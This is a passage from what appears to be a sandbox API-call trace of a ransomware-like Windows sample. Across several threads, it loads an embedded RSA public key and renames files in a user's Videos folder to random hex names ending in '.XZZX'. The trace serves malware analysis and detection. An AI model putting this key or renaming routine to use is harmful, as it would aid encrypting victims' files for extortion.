MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.005] lstrcpyW (in: lpString1=0x2baf460, lpString2="0790B504415F6E976181B814459452DF.XZZX" | out: lpString1="0790B504415F6E976181B814459452DF.XZZX") returned="0790B504415F6E976181B814459452DF.XZZX" [0254.005] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0254.005] SetErrorMode (uMode=0x1) returned 0x1 [0254.005] lstrcpyW (in: lpString1=0x2baf860, lpString2="0790B504415F6E976181B814459452DF.XZZX" | out: lpString1="0790B504415F6E976181B814459452DF.XZZX") returned="0790B504415F6E976181B814459452DF.XZZX" [0254.005] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8f53651d, Data2=0xf34e, Data3=0x4a46, Data4=([0]=0x90, [1]=0x90, [2]=0xd3, [3]=0x80, [4]=0x55, [5]=0x67, [6]=0x67, [7]=0x7b))) returned 0x0 [0254.005] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\0790B504415F6E976181B814459452DF.XZZX") returned 96 [0254.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.005] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\D46355D6469713548F53651D4951F79C.XZZX") returned 96 [0254.006] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1037 os_tid = 0x1344 [0254.161] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.161] lstrcpyW (in: lpString1=0x2baf460, lpString2="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" | out: lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" [0254.161] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0254.161] SetErrorMode (uMode=0x1) returned 0x1 [0254.161] lstrcpyW (in: lpString1=0x2baf860, lpString2="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" | out: lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" [0254.161] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8925a94a, Data2=0xb4cc, Data3=0x4720, Data4=([0]=0xa1, [1]=0xbe, [2]=0x4d, [3]=0x22, [4]=0xeb, [5]=0xae, [6]=0xe8, [7]=0xc9))) returned 0x0 [0254.161] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned 96 [0254.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.161] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\C50AEEF8323B2D808925A94A34F611C8.XZZX") returned 96 [0254.161] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1038 os_tid = 0x1348 [0254.319] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.319] lstrcpyW (in: lpString1=0x2baf460, lpString2="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" | out: lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" [0254.319] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.319] SetErrorMode (uMode=0x1) returned 0x1 [0254.319] lstrcpyW (in: lpString1=0x2baf860, lpString2="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" | out: lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" [0254.319] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x4604b804, Data2=0xd2b9, Data3=0x4422, Data4=([0]=0x9b, [1]=0xe1, [2]=0x6e, [3]=0xae, [4]=0x7, [5]=0x1c, [6]=0x2f, [7]=0xc))) returned 0x0 [0254.319] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned 117 [0254.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.319] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\785C42E4381520924604B8043AD004DA.XZZX") returned 117 [0254.319] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1039 os_tid = 0x134c [0254.474] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.474] lstrcpyW (in: lpString1=0x2baf460, lpString2="3509B27C28C34484E701F4A52D2D28CC.XZZX" | out: lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX") returned="3509B27C28C34484E701F4A52D2D28CC.XZZX" [0254.474] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.474] SetErrorMode (uMode=0x1) returned 0x1 [0254.474] lstrcpyW (in: lpString1=0x2baf860, lpString2="3509B27C28C34484E701F4A52D2D28CC.XZZX" | out: lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX") returned="3509B27C28C34484E701F4A52D2D28CC.XZZX" [0254.474] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x61e28f6e, Data2=0xdcc3, Data3=0x460c, Data4=([0]=0x81, [1]=0x70, [2]=0xd9, [3]=0x2c, [4]=0xbf, [5]=0x9, [6]=0xed, [7]=0xc5))) returned 0x0 [0254.474] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\3509B27C28C34484E701F4A52D2D28CC.XZZX") returned 117 [0254.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.474] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\42D5C8CA3C67AB2461E28F6E3F228F6C.XZZX") returned 117 [0254.476] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1040 os_tid = 0x1350 [0254.630] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.630] lstrcpyW (in: lpString1=0x2baf460, lpString2="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" | out: lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" [0254.630] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.630] SetErrorMode (uMode=0x1) returned 0x1 [0254.630] lstrcpyW (in: lpString1=0x2baf860, lpString2="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" | out: lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" [0254.630] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x11fdf700, Data2=0xfd2a, Data3=0x445b, Data4=([0]=0xa6, [1]=0x13, [2]=0x8b, [3]=0x87, [4]=0x62, [5]=0x82, [6]=0x7d, [7]=0x6e))) returned 0x0 [0254.630] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned 117 [0254.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.630] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\F0C58600439925EE11FDF70046540A36.XZZX") returned 117 [0254.630] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1041 os_tid = 0x1354 [0254.785] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.786] lstrcpyW (in: lpString1=0x2baf460, lpString2="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" | out: lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" [0254.786] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.786] SetErrorMode (uMode=0x1) returned 0x1 [0254.786] lstrcpyW (in: lpString1=0x2baf860, lpString2="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" | out: lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" [0254.786] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x2189d2cc, Data2=0xe818, Data3=0x4e09, Data4=([0]=0xbe, [1]=0xd5, [2]=0xfa, [3]=0xdf, [4]=0xa2, [5]=0xc0, [6]=0x4a, [7]=0x8f))) returned 0x0 [0254.786] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned 117 [0254.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.786] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\0BF4A32046BF78D82189D2CC497A5D20.XZZX") returned 117 [0254.786] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1042 os_tid = 0x1358 [0254.942] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.942] lstrcpyW (in: lpString1=0x2baf460, lpString2="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" | out: lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" [0254.942] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0254.942] SetErrorMode (uMode=0x1) returned 0x1 [0254.942] lstrcpyW (in: lpString1=0x2baf860, lpString2="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" | out: lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" [0254.942] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xfecc0106, Data2=0x4261, Data3=0x4eea, Data4=([0]=0x95, [1]=0xb2, [2]=0x97, [3]=0xe1, [4]=0x63, [5]=0xae, [6]=0xc2, [7]=0xcd))) returned 0x0 [0254.942] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned 117 [0254.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0254.942] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\238FEF4614763AAAFECC010617311EF2.XZZX") returned 117 [0254.942] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1043 os_tid = 0x135c [0255.098] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.098] lstrcpyW (in: lpString1=0x2baf460, lpString2="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" | out: lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" [0255.098] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0255.098] SetErrorMode (uMode=0x1) returned 0x1 [0255.098] lstrcpyW (in: lpString1=0x2baf860, lpString2="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" | out: lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" [0255.098] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x969cd206, Data2=0x1df0, Data3=0x4f18, Data4=([0]=0x82, [1]=0xfb, [2]=0xb8, [3]=0x72, [4]=0x78, [5]=0xe0, [6]=0x12, [7]=0x65))) returned 0x0 [0255.098] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned 117 [0255.098] MultiByteToWideChar (in: 